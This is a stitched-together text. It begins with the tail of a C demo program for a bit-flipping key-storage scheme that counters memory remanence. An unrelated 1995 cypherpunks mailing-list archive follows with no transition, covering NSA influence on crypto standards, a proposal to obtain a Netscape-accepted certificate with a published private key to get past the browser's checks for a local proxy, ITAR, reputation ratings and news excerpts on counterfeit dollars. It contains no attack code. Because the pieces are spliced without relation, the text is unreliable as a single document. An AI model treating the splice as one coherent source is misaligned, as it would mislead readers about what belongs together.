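    for (size_t i = 0; i < KEY_LEN; i++) key[i] = (uint8_t)(i * 17 + 3); /* constructed sample key */

    fk_load(&k, key);
    fk_flip(&k);
    fk_read(&k, out);
    printf("readable while inverted: %s\n", memcmp(out, key, KEY_LEN) == 0 ? "yes" : "no");
    printf("bit 0 held 1 for %u of 1000 periods without flipping\n",
           fk_ticks_bit_set(key, 1000, 0, 0, 0));
    printf("bit 0 held 1 for %u of 1000 periods with flipping\n",
           fk_ticks_bit_set(key, 1000, 0, 0, 1));
    memset(out, 0, sizeof out);
    fk_wipe(&k);
    return 0;
}
```

The scheme only evens out how long each cell holds each value; copies of the key in registers, caches, swap or the buffer filled by fk_read are outside what it covers.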




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 4 Sep 95 20:48:12 PDT
To: David Murray <tcmay@got.net (Timothy C. May)
Subject: Re: A problem with anonymity
Message-ID: <199509050347.UAA09032@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 06:40 PM 9/2/95 +1300, David Murray wrote:
> I still think that, because of
> the (perfect) ease with which net.rep's are transferrable/cash-in-able,
> the chances you take in the digital domain are so much higher as to be
> (almost?) qualitatively different.

Then good names will have sufficient cash value, that their owners will
be deeply reluctant to damage those good names.

Obviously if one can obtain a good name cheaply, then it might be profitable
to misuse it.  In which case we swiftly run short of good names, and they
become expensive.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Simmons <jsimmons@goblin.punk.net>
Date: Mon, 4 Sep 95 20:51:06 PDT
To: cypherpunks@toad.com
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050153.SAA23364@netcom17.netcom.com>
Message-ID: <199509050348.UAA19868@goblin.punk.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> >> understand marketing or human psychology. Clipper, the closest the
> >> agency has come to creeping out of the darkness of their coffin,
> >> was a total fiasco. the self-destructing director of NSA whats-his-name
> >> who was running for that FBI position or whatever is another example of how 
> >> the inbred spook society has difficulty dealing with anything outside
> >> their artificial reality.
> >
> >I think you are dead wrong.  The NSA has mastered the market psychology.
> >Who has defined all of the most popular standards? DES, DSS, ElGamal, SHS...
> >the NSA has had a hand in them all.  DES is by far the most popular cipher,
> >popular enough that it will take years and years to switch to something new.
> 
> no, I think the NSA is very adept at infiltrating and twisting existing
> cryptographic market processes to suit their own ends. DES is a good example
> of this. it was created by IBM largely, and then "manipulated" by the
> NSA. this is well known and understood. the NSA does not work with standards
> or markets so much as *interfere* with them. how can you deny this basic
> premise embraced by virtually everyone on this list?
> 
The NSA doesn't really bother me all that much, because all they've managed
up to now is to slow things down (by about 3 hrs. in the case of PGPhone).
But what happens when someone who HAS mastered market psychology gets into
the game?

Here's a prediction:  within one year, we will see the advent of Micro$oft's
"Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
Micro$oft itself, or a flat-out trap door.  ANY communications with a 
Windoze box or network will have to use it, or lose the market.  About the
same time, Justice will suddenly 'lose interest' in its various 
investigations of M$.  Micro$oft will probably give it away for free as part
of the Windows 95.702 upgrade. 

At this point, the NSA's 'speed bump' becomes Micro$oft's 'brick wall'.  And
while some of us will continue to use PGP and other strong crypto, the average
American will have kissed off ALL of her privacy to the tune of "... you make
a grown man cry."

-- 
Jeff Simmons                           jsimmons@goblin.punk.net



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Mon, 4 Sep 95 21:19:00 PDT
To: cypherpunks@toad.com
Subject: Re: SSLRef (SSLtelnet)
Message-ID: <199509050417.VAA05211@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Adam Shostack <adam@bwh.harvard.edu>
> 	To get a certificate, you need to talk to Verisign, and give
> them a business plan, a key, and 270 bucks per year to get your key
> certified.
> 
> 	Verisign is a spin off of RSA.

Yes, this is my understanding.  I have also heard that the process is
not easy or routine, that the business plan receives considerable
scrutiny.  What I would be doing with the certificate is
unconventional.  I would publicize the secret key, and ship out free
software which would use the certificate to establish SSL
communications with the Netscape browser within the same PC that runs
the browser.  The real purpose of the certificate is not to
authenticate the key of a server running remotely, but simply to bypass
the security checks within Netscape Navigator.  So I am not confident
that this business plan will pass Verisign's muster.  Among other things,
it would be difficult to enforce the one year restriction (unless
Navigator checks a date in the certificate).

I understand that Netscape's browser will also accept certificates
created by a Netscape-internal "test" CA.  I hoped that perhaps some junk
certificates from that CA might be floating around, ones which would be
useless for conventional purposes because their secret keys are exposed,
but which would be perfect for my needs.

There is one "fallback" strategy possible which would allow the 128-bit
SSL security proxy to work.  That is to filter *all* connections, not
just secure ones, and convert https: URL's to http:.  Then Navigator will
not attempt to make any SSL connections at all, and the proxy can talk to
it non-securely, using 128-bit SSL for the external connection to the
server.  However this would be much harder, and the proxy would have to
somehow remember which URL's had been massaged like this so it would know
which ones are eligible to have secure connections made.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian S. Nelson" <ian@bvsd.k12.co.us>
Date: Mon, 4 Sep 95 21:16:04 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050153.SAA23364@netcom17.netcom.com>
Message-ID: <199509050415.WAA05593@bvsd.k12.co.us>
MIME-Version: 1.0
Content-Type: text/plain


> no, I think the NSA is very adept at infiltrating and twisting existing
> cryptographic market processes to suit their own ends. DES is a good example
> of this. it was created by IBM largely, and then "manipulated" by the
> NSA. this is well known and understood. the NSA does not work with standards

Well known that the NSA manipulated DES?  How so?  I am willing to believe that
they had a lot of say in it and they probably wanted it weakened, but I think
you'll be very hard pressed to find proof of that.  Based on some of the 
analysis of lucifer, it could be said that IBM weakened the key space 
because that was a side effect of adding strength to the overall cipher.  
Keyspace is just about the only weakness of DES, I don't think that can be said
about lucifer.

> or markets so much as *interfere* with them. how can you deny this basic
> premise embraced by virtually everyone on this list?

Interference is just noise, the NSA has pretty much pushed the market where they
want it to go.  If you think that is just "interference" then we use the word
differently.  

> clearly, the first attempt was to get the public to embrace clipper. lacking
> that, they have thwarted natural market progression. I agree they have
> done this. but it's like making a pool shot accidentally and saying,
> "I meant to do that". the NSA is *not* an agency that has a single clue
> about *real* markets. they do have a brilliant ability to leverage their
> political coercion skills to the absolute maximum to *manipulate* and
> *interfere* and *piss on* newly growing markets. 

If they are as powerful as we both seem to think (easily "interfering" with 
markets and screwing the public for decades) how can you underestimate them like
that?  If they are actually spying on us, then they know what moves we'll make
and they can always head that off, it's not slop pool.  If they aren't then I
don't know what I'm supposed to hold against them, I don't have to use their
standards unless I wish to export stuff.

> 
> the NSA has screwed
> up public crypto in uncountable ways. you cannot deny this!! they secretly

This is true, they make long term industry standards that are short lived.
DES's keyspace was far too small.  Escrow isn't a great idea (except for 
signatures) ITAR is bullshit.

> visit people doing state-of-the-art research and intimidate them into
> silence or going other directions. they visited Mosaic designers to tell
> them that the things they were installing in the software were not 
> acceptable legally. of course, any other legal arm of the government
> would simply sue once the software appeared, but not try to manipulate
> the design prior to its release. this is the tactics of an *espionage*
> and *intelligence* agency. surprise!!

This is all hearsay.  I doubt that the mosaic designers have had any contact 
with the NSA unless they invented a significant new cryptographic technology,
all Netscape/Mosaic have done is implement existing technology.  They even
implemented SSL with the 40bit exportable key size using rc4, which is what 
the law says you are supposed to do.  Any netscape employees want to dispute 
this and tell me about your encounters with the NSA?

> huge amounts of cash and credibility have been WASTED on it. the NSA has
> lost enormous credibility because of this fiasco. furthermore, the way
> they tried to hide behind presidential directives is absolutely repugnant
> to anyone who has a belief in the separation of powers within our 
> government.

They have only lost credibility to the cryptographic community, where they
already had very little credibility.  This is the point that we all tend to 
overlook.  Joe SixPack, doesn't know much about the NSA or cryptography, when
first told about them he tends to think that they are there to protect him and
doesn't think of them as an enemy.  The biggest accomplishment of the clipper
thing is that nobody (very few at least) are using secure public key crypto
and the few new people to the issue have no idea who to trust now.  If their
job is to listen to transmissions, then their money was well spent because there
aren't many secure transmissions right now.  and since everybody is scared about
it there aren't likely going to be a lot of secure transmissions real soon.


> do you realize the sheer ability of Microsoft to build software that
> succeeds in *markets*? Microsoft doesn't care much about Netscape
> because, as one microsoft engineer remarked, "well, it's strange
> to talk about market share when you are giving away software for free".
> well, the NSA is the absolute *opposite* of Microsoft. they don't
> have a *clue* about true market forces. they do however understand
> ways in which the government interferes with markets, and they seize
> on every one of those mechanisms as their lifeblood for control
> and "shadow/invisible oppression".

I disagree, the NSA and MS have a lot in common, they both have defined shoddy
standards that we are all using for one part of our life or other.  We will
have to put up with both of them for a long time and both of them are 
anticompetitive.  If market forces were so much more powerful than the NSA can
understand, then why the hell are all the banks in the world depending on DES?

> the NSA is quickly losing relevance. the public *does* desire public
> key crypto, and a de facto standard *has* been created, it's called PGP.
> if the NSA proposes something in public key areas, it is likely to 
> be pissed on by the public as much as Clipper, in many ways because
> of the failure of Clipper. clipper in a big sense *was* the NSA's first
> step toward public key encryption, and it was widely trounced on.

The NSA is only losing relevance with us, how many average folks even know what
clipper was?  We could even disregard the average people and just ask the 
computer users, how many of those 80million windows users know about clipper?
If it is enough for the NSA to "lose relevance" I would think this list would
be many times larger than it is. 

> 
> face it dude, the NSA has shown far less competence in the public arena
> than *any* apologist such as yourself can ever demonstrate.
> 

I take offence at that, I am not an apologist, I'm just trying to show the other
side.  We can't fight the NSA if we are all blind to what they do in the general
public's eyes.  For what it's worth, I can't think of a major commercial product
that uses cryptography that hasn't had the NSA's hands in it; that is pretty 
damn competent if you ask me.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Mon, 4 Sep 95 19:46:28 PDT
To: hfinney@shell.portal.com (Hal)
Subject: Re: SSLRef (SSLtelnet)
In-Reply-To: <199509031948.MAA17974@jobe.shell.portal.com>
Message-ID: <199509050246.WAA14488@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


	To get a certificate, you need to talk to Verisign, and give
them a business plan, a key, and 270 bucks per year to get your key
certified.

	Verisign is a spin off of RSA.

| The stumbling block is that Netscape won't connect to even the local
| proxy unless it sees a valid certificate, one signed by a CA that it
| accepts.  For this application I would need such a certificate, and make
| the corresponding public and private keys public, hard-coding them into
| the proxy.  Since the proxy runs on the same PC as the browser there is
| no need for confidentiality between them, and the secret key can be
| revealed.
| 
| Does anyone have an idea for a way to acquire a certificate acceptable to
| Netscape, perhaps one with a "broken key", that could be used for this
| purpose?
| 
| Hal
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Mon, 4 Sep 95 23:48:23 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: DUMPSTER BONANZA
Message-ID: <Pine.SUN.3.91.950904224931.8980A-100000@crl5.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

This is not a crypto post, but those interested in threat models 
and counter-measures might want to read on.

I just looked at the October issue of Soldier of Fortune.  In an
article entitled "SOF Exposes ATF's Warbirds" the author tells
about the 7 to 12 attack aircraft that the BATF has purchased.

Of course, it's interesting to hear how and why this agency
decided it needed an airforce to pursue its mission, but the real
story for me was how SOF busted them.

SOF had heard rumors about a covert operation on the part of the
BATF to procure these aircraft.  They did their own surveillance
of the BATF's phony cover corporation.  This included dumpster
diving.  What they came up with was unbelievable.  It included
agents' home addresses, the names of family members, official BATF
stationery, the works.

If you want to read a fascinating tale of BATF incompetence and
duplicity, check this one out.


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 4 Sep 95 22:12:29 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: article/author ratings/reputations (was Re: pseudonyms & list health)
In-Reply-To: <9509040614.AA01461@cs.umass.edu>
Message-ID: <199509050512.XAA08518@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Futplex sez:
> 
> A reviewer named Susan Granger, for example, is known to me as a person who 
> routinely lauds lousy movies. Thus it's simple for me to ignore her positive
> recommendations (I've yet to see a negative review from her). In fact, when
> I observe that a new film prominently features her seal of approval in its 
> advertising, I take that fact as an indication of the lack of praise from
> more discriminating reviewers. So a nominal "positive" credential may be
> interpreted as an implicit negative credential, depending upon context.
> 
> OTOH, if I only give digital thumbs-up to a couple of people on the list,
> those who consider me a reputable appraiser-of-cpunks should find the
> information relatively useful. I'm sure I can manage to be a harsher critic
> than your 2nd-grade teacher :}  Using e.g. a single 1-10 scale would be
> highly practical for such purposes, IMHO.


There are people working on an extension of UseNet to allow each reader to
publish ratings which propagate in the same way that articles do.  These
ratings can be of specific articles, of threads or of authors.  Your
newsreaders can rank the articles and present them to you in
highest-to-lowest ranked order, or kill all those below a certain mark, or
some such.

The heuristic that the researchers originally started with was "if I agreed 
with so-and-so in the past then I'll probably agree with him again."  
(Personally I would rather have some degree of manual control over my 
ratings-weightings.  My good friends automatically get more weight than 
people I don't know, regardless of how much our ratings coincide.  
Similarly I might want to downgrade certain net.assholes just out of a 
sense of justice, even if they recommend good articles usually.  :-) )


Unfortunately I have lost the URL for this wonderful experiment.  Hopefully
the fruits of their labors will become publicly available soon.  I will
certainly be one of the first to sign up to distribute ratings and to listen
to (some) other people's.


Bryce

signatures follow:


                                 +                                           
    public key on keyservers     /.       island Life in a chaos sea         
    or via finger 0x617c6db9     /             bryce.wilcox@colorado.edu     
                                 ---*                                     

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBMEvcJfWZSllhfG25AQE+0QQAj2rx2gT9gaYlMyhiJd3TkfrjAS9dVcYk
iFUHu1wsrcIoXvHExRmvborJArcix7uz/qptO9lg8DHRAxHYGtJyEzDaCnq60juz
xFHt/7NdV+gLIv5JVHFDCxTzzfmwNSvr5Q2Rb5vv8jUmih4AhSzkApBHF/lzFhNH
2U3SYK7Vmhc=
=Zodf
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryce Wilcox <wilcoxb@nag.cs.colorado.edu>
Date: Mon, 4 Sep 95 22:15:38 PDT
To: liberty@gate.net (Jim Ray)
Subject: Re: Wearing RSA shirt to school
In-Reply-To: <199509041203.IAA38469@tequesta.gate.net>
Message-ID: <199509050515.XAA08896@nag.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Note failed signature.  Great Dave Barry quote, by the way.  :-)


Bryce


******* rest of message is file included by Bryce

- -----BEGIN PGP SIGNED MESSAGE-----

Tim wrote:

<snips throughout>

>At 4:43 AM 9/4/95, Futplex wrote:
>>I wrote:
>>> With respect to possession within the U.S., there aren't any
>>> laws stopping you from waving strong cryptography around wherever you like
>>> (at least, not yet).
>>
>>----
>>...and in private email, Jim Ray pointed out that showing the shirt to a
>>foreign national might technically violate ITAR...
>
>Nope, no more so than letting a foreign national read Schneier's book is a
>violation of the ITAR. If you dispute this, ask whether Schneier's book is
>banned from export (the book, not the optional diskette). It isn't. Nor are
>other cryptography _books_ banned from export.

The law doesn't have to be consistent, or to make sense, or be
enforced evenhandedly. The law is, after all, not written, or
interpreted, or enforced, by partisan Libertarians like me.
My private email to Futplex said *may* violate... and I stand
by it. [IANAL, though.] Whether or not a law as incontrovertibly
stupid as ITAR is enforced may depend on the timing of the next
election, as we seem to be witnessing in the limbo-state of PRZ.

>I'm not minimizing the issue of export of machine-readable code, as in
>diskettes. But to claim that a blurry, printed on cotton "barcode" is even
>remotely in the same class as exporting a workable set of cryptographic
>system routines, or that letting a furriner merely "gaze upon" this blurry
>barcode, is a violation of the ITARs is laughable.

Yes, but *many* laws are laughable.

>>Yeah, I suppose I overstated it a bit. It appears that if the ITAR do cover
>>the shirt (unclear at present, AFAIK -- any news on the CJR, Raph ?), then
>>flashing it at a furriner could constitute a violation. Thanks for the
>>correction.

Actually, it was less a correction than me pointing out (yet another)
note of uncertainty. James Madison, in Federalist #62 said it best:

"What indeed are all the repealing, explaining, and amending laws, which
fill and disgrace our voluminous codes, but so many monuments of deficient
wisdom." 

Now, many of us would be more than satisfied to get back to that level of
government. I suggest that everyone go have a look at the entire Code of
Federal Regulations, before the next election. <g>

>the original questioner need not fret about his son wearing the
>>shirt to school.

I agree that wearing it through Customs on the way to Jamaica would
be more problematic, but I live next to a US Customs agent, and he
learned about ITAR from me. Here in Miami, Customs has plenty to
think about with the various (occasionally venomous) inbound cargo.

>It was this series of posts about whether wearing the "munitions t-shirt"
>near schools was a crime or not that made me think the silly season had
>arrived.

It has, a long time ago. Ever watch C-SPAN?
JMR


- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMEro1W1lp8bpvW01AQHKsgP/bhOcCUoksLvbGe/nAKxDqZU8KvibvRFm
nQ++Xy3FjDDJrFg1/lgmivtrriuFK/xg4CvKdu+yQ6zJ72pH+92cLivsfHeg+ljZ
MPSXfHftaOP7i1e4KajnlC3jBcYbWQnqZRdduIyPXZnfn5xK5bU99c5oceCABtSx
UD/Hp9Poqbc=
=7tMD
- -----END PGP SIGNATURE-----
Regards, Jim Ray

See, when the GOVERNMENT spends money, it creates jobs; whereas 
when the money is left in the hands of TAXPAYERS, God only knows 
what they do with it.  Bake it into pies, probably.  Anything to 
avoid creating jobs.  -- Dave Barry
- ------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35  James M. Ray  <liberty@gate.net>
- ------------------------------------------------------------------------
Support Phil! email zldf@clark.net or see http://www.netresponse.com/zldf
________________________________________________________________________



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta3

iQCVAwUBMEvc4vWZSllhfG25AQHtewP/YYdT/kcDZOtykQnKKU6OTcas006ft/dq
nB76g1DBJqNzyZj4UHE+AVoMZ61wCMXHUwjipTwfXHMYwJ5ystJQ9LbPUgMIb1kx
GNyZua7VJwvaGO2+M0FCzBopoQs2MavegxPdAPaxquZJWlB1KesbLkNoUWIF4St6
XtxP4EcVec4=
=1bvR
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 20:44:48 PDT
To: cypherpunks@toad.com
Subject: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <Pine.SUN.3.91.950904234136.7378C-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain




I have received a pile of requests for citations.
Here are segments of a few.  As I typed them all by hand, errors 
are likely to be mine.

My comments follow the articles, so you can stop reading just before them :)


###The San Francisco Examiner
March 7, 1995  - Tuesday

Global Counterfeiting traced to Tehran

[...]

For the past five years, so called superbills, crisp $100 Federal 
Reserve Notes, so perfectly forged that they might be fresh off 
U.S. government printing presses, have been flooding banks and 
money markets around the world.  The total amount currently in 
circulation is believed to be $10 Billion or more.

Currency officials alarmed.

Alarmed Treasury and Federal Reserve Board officials fear the 
increasing number of such superbills has shaken international 
confidence in America's currency.

[...]

From the moment the new superbills surfaced in 1989, it was clear 
to the secret service... that these were no ordinary forgeries.  
Under microscopic examination, they showed only infinitesimal 
differences from legitimate notes.  Most significant, the 
counterfeits had been printed on presses virtually identical to 
those used at the Bureau of Engraving and Printing.

Secret service investigators concentrated on those nations that 
had acquired the same kind of intaglio presses.  Only two 
companies sold them on the international market.  One was a U.S. 
company, none of whose overseas customers was considered suspect.  
The second was a Swiss company, De La Rue Giori.

Evidence pointed to Iran

By the end of 1991, investigators had eliminated all but one of 
Giori's clients: the Islamic Republic of Iran.

[...]

Intelligence agencies uncovered evidence that Iran was not only 
mass-producing the notes, but had built a world-wide distribution 
network.  Key transshipment points had been established in 
Lebanon, Syria, Sudan, and North Korea.

Ronald de Valderano of Britain's Research Foundation for the Study 
of Terrorism says practically every Iranian-backed terrorist cell 
in the world is at least partially supported by the forgeries.  
The notes most often are used to buy arms or pay operating 
expenses or are sold on the currency black markets for legal cash.  
Indeed, when FBI agents searched the residence of suspects 
arrested for the bombing of New York's World Trade center, they 
found $20,000 of the forgeries.

[...]

Critics have for years urged that U.S. currency be better 
protected against such onslaughts.  Last July, the treasury 
finally announced that changes were planned for U.S. currency, 
including covert security features.

[...]



###The Independent
June 19, 1995 - Monday

'Perfect' dollar forgeries flood Middle East; The Israeli and 
Iranian governments top the list of suspects behind the faultless 
$100 bills.

Robert Fisk

The Lebanese know how to spot a fake.  Fake weapons, fake 
perfumes, fake diplomatic consuls, fake money.  But the latest US 
$100 bills are as near perfect forgeries as they have seen, many of 
them accepted happily by Beirut's notoriously suspicious money 
changers.

[...]

The bills, dated 1988 but probably forged in Lebanon in the 
following two years - the last two years of the civil war - are 
still arriving at the Allied Business Bank at the rate of one a 
month, often brought in from Cyprus or other Middle East states by 
Arab clients unaware that they are forged.

[Laws of most middle eastern countries make perfect forgeries a 
capital crime]

"Anyone who makes a 'perfect' dollar bill out here is going to get 
strung up if he's caught," another bank official said.  "So the 
guys who're going to make a perfect note, without any mistakes, 
are working for a government who will protect them.  So a 
government must be involved, the intelligence services, 
ministries, the lot."

A senior bank official in Lebanon believed that Iran or Israel 
might be responsible.  "When you're producing this kind of high-
tech stuff, it's got to have official backing," he said.  "If 
you're spending this kind of money on a 'perfect' forgery, it's 
for big business - for political parties, arms purchases, for 
paying militias."

He repeated a rumour believed by several other banking officials 
in Lebanon - that the "perfect" dollars might be coming off 
counterfeit presses and dollar plates taken into Afghanistan by 
the Soviet intelligence service during the Soviet occupation; 
Afghanistan is now divided among militias respectively funded by 
Saudi Arabia and Iran.

[...]

"The security thread is the reason why we are alarmed," the senior 
Lebanese bank official said of the new forgeries.  "It's not easy 
to get the thread in.  You put in the thread when you produce the 
note - it's not printed on, it's embedded in the paper.  And it's 
a real security thread.

"We suspect they're being exported to a variety of places: to the 
US, to the former Soviet Union...."

Other bank officials suspect Iran... and suggest that Tehran has 
used fake currency bills to fund the Hizbollah, Hamas and other 
armed groups which are opposed to Israeli occupation.



###The Washington Post
May 05, 1995 - Friday, Final edition

Bogus Bills?;  Rumors Persist That Iran Is Counterfeiting U.S. 
Currency to Sabotage the Economy.

Thomas W. Lippman

[...]

The allegation that Iran is waging economic warfare against the 
United States by printing and distributing millions of dollars in 
phony U.S. currency has been circulating on Capitol Hill at least 
since 1992, when it was made by a House Republican Task Force on 
Terrorism and Unconventional Warfare.

It might even be true or partly true, according to some sources.  
There is a problem with counterfeit greenbacks around the world, 
these sources said.  It's just not clear that Iran is responsible 
for it.

The question arose again Tuesday when the irrepressible Rep. Dana 
Rohrabacher (R-Calif.) asked Assistant Secretary of State Robert 
Pelletreau about it in an International Relations Committee 
hearing on the Clinton administration's economic boycott of Iran.

Rohrabacher, who spent much of the recent congressional recess 
traveling in Asia, said he heard about the phony money from many 
people.  "Have you received any credible reports that the Iranians 
are counterfeiting American money?" he asked.

Pelletreau, a normally unflappable career diplomat, looked 
uncomfortable.

"I know there is an intense investigation and campaign underway, 
led by the U.S. Secret Service to uncover all the sources of 
counterfeiting of American money abroad," he said.  "I just am 
personally not in a position to give you the exact details of what 
we believe Iranian involvement is in that."

"There are many leaders throughout the world... who believe that 
the American currency is being undermined by an intentional act of 
economic warfare on the part of the Iranian government... by 
counterfeiting billions of dollars' worth of U.S. currency," 
Rohrabacher said.  "Am I getting you right that basically you're 
not denying that this is going on?"

"I am not denying it," Pelletreau said.  The 1992 GOP report said 
the fake currency is being printed in the Iranian mint in Tehran, 
"using equipment and know-how purchased from the U.S. during the 
reign of the Shah," which ended in 1979....  A Wall Street Journal 
report at the time said that the phony bills-- whoever was making 
them-- were so good they could fool sophisticated currency-
handling equipment at the Federal Reserve.



###Counterfeiting and Money Laundering Deterrence Act of 1995
Patrick Leahy

I rise today to introduce the Counterfeiting and Money Laundering 
Deterrence Act of 1995.

[...]

A number of analysts believe the threat to the U.S. currency is 
urgent. News reports say that intelligence experts in the U.S. and 
Israel are aware of a highly skilled group of counterfeiters 
operating out of Lebanon's Bekaa Valley.  The counterfeiters, 
controlled by Syria and Iran, have turned out as much as $1 
billion of the extremely high-quality reproductions of the U.S. 
$100 bill.

[...]

First, the bill requires all existing $100 denomination U.S. 
currency to be exchanged within a 6-month period.  This would make 
drug traffickers who hoard vast amounts of hard currency hard-
pressed to convert their existing cash into the new money.  If 
they cannot exchange their funds in the specified time frame, 
their funds are worthless under the bill.

[...]

Second, the bill establishes two new versions of the $100 bill: 
one for use at home and one for use abroad.  The only business 
that relies on exporting large amounts of hard currency is drug 
trafficking.  This provision would make money smuggled out of the 
United States worthless, turning the tables on drug traffickers 
who covertly move money from the streets of this country to 
foreign bankers who launder it without reporting illicit 
transactions to the Treasury.

A U.S. citizen traveling abroad who wished to bring $100 currency 
with him would hardly be inconvenienced by this measure: a quick 
stop at a U.S. bank to convert their greenbacks into differently-
colored foreign-use bills would be all that is necessary-- just 
like purchasing travelers' checks.  The only ones who would be 
inconvenienced would be drug traffickers who would hate to exchange 
their greenbacks for foreign use currency at a U.S. bank because 
of currency transaction reporting requirements.

[...]


### END ARTICLES



The presence of counterfeit bills, the legislation to defeat them, 
and the general sentiment of government in the matter is 
disturbing for a few reasons.

1.  Focus on Surveillance

The legislation adopted to defeat counterfeiting is linked with 
the four horsemen quite closely.  The solution, instead of making 
the bills difficult to forge like they should have been in the 
first place (U.S. bills are currently the easiest to forge of 
western nations- and counterfeit bills are long lived as currency 
changes are unheard of in the U.S.) is to create a regime where an 
additional tier of reporting is required.  It seems the first 
answer to every "problem" (read: every element which might allow 
citizen autonomy) now is to link it to money laundering and 
terrorism and drop a blanket solution over it which without fail 
includes high-level reporting or tracking elements.  (Anyone seen 
this before with the... oh, I dunno, strong encryption issue?)

2.  The demonization of cash.

I have written here before on the increasing difficulty with which 
one uses cash without suspicion in the United States.  It has come 
to the point where money, in any amount, won't buy you everything 
anymore.  Many products and services are available ONLY by credit 
or credit card- and by extension, available only to traceable 
transactions.  Is it any wonder Americans have one of the lowest 
ratios of income to debt in the world today?  "They" would have 
you believe that cash is nothing but a tool for the four horsemen.  
I am most disturbed in this context by the way the act is 
financed- i.e. by the extinguished obligations from unexchanged 
currency.  Does this measure sound ominous to anyone but me?

3.  The corruption of e-cash to further the above.

If the government is disturbed by the laundering of money enough 
to actually print, or even propose printing, two kinds of 
currency, how will they respond to untraceable, unaccountable and 
infinitely liquid e-cash?  I think the answer is in past behavior:  
e-cash will be linked to the four horsemen and subjected to 
rigorous reporting requirements- systems which are true e-cash 
will be banned.  At the same time the widespread presence and use 
of e-cash will be used to question anyone who uses physical 
currency.  The death of cash continues as it were.  Why would 
anyone carry bills anymore when a plastic smartcard (or your 
high school ring) is so much more convenient?  You must have 
something to hide.  No, good citizen units will WANT to use "e-
cash" because they are honest, and know the government means them 
no harm and is here to protect them from the four horsemen.


The cash is dead, long live the king.



00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Mon, 4 Sep 95 21:01:44 PDT
To: Jeff Simmons <jsimmons@goblin.punk.net>
Subject: Re: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509050348.UAA19868@goblin.punk.net>
Message-ID: <Pine.SUN.3.91.950904235841.8362A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 4 Sep 1995, Jeff Simmons wrote:

> Date: Mon, 4 Sep 1995 20:48:51 -0700 (PDT)
> From: Jeff Simmons <jsimmons@goblin.punk.net>
> To: cypherpunks@toad.com
> Subject: Re: NSA says Joe Sixpack won't buy crypto
> 
> Here's a prediction:  within one year, we will see the advent of Micro$oft's
> "Not So Bad Privacy".  It'll be a secret algorithm with either GAK done by
> Micro$oft itself, or a flat-out trap door.  ANY communications with a 
> Windoze box or network will have to use it, or lose the market.


It's here already.
It's called "lotus notes."


> About the
> same time, Justice will suddenly 'lose interest' in its various 
> investigations of M$.  Micro$oft will probably give it away for free as part
> of the Windows 95.702 upgrade. 

Wait a few months.  Justice is boring of the investigation even now.

> -- 
> Jeff Simmons                           jsimmons@goblin.punk.net
> 


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Timothy L. Nali" <tn0s+@andrew.cmu.edu>
Date: Mon, 4 Sep 95 21:31:28 PDT
